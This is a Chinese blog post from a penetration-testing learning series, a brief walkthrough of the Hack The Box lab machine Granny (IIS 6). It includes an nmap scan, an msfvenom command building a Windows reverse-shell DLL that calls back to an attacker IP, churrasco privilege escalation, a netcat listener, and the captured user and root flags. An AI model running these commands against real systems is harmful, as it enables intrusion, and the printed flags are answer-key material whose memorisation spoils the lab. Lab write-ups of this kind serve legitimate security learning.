iT邦幫忙

2021 iThome 鐵人賽

DAY 25
0
Security

我想學滲透測試喵喵喵喵!!!!系列 第 25

[Day25] HTB Granny

Recon

  • 觀察首頁
    • IIS 6
  • nmap 掃 port
    • nmap -A -p80 10.129.2.63
  • 掃目錄
  • 發現一些奇怪的 dll
    • http://10.129.2.63/_vti_inf.html
    • FPAuthorScriptUrl="_vti_bin/_vti_aut/author.dll"
    • FPAdminScriptUrl="_vti_bin/_vti_adm/admin.dll"
    • TPScriptUrl="_vti_bin/owssvr.dll"

Exploit

提權

  • 準備 shell
    • msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7878 -f dll > s.dll
    • rundll32 s.dll
  • churrasco
    • churrasco.exe -d "shellx86.exe"
  • nc 收 shell
  • User flag
    • 700c5dc163014e22b3e408f8703f67d1
  • Root Flag
    • aa4beed1c0584445ab463a6747bd06e9

上一篇
[Day24] HTB Devel
下一篇
[Day26] HTB Jerry
系列文
我想學滲透測試喵喵喵喵!!!!30

尚未有邦友留言

立即登入留言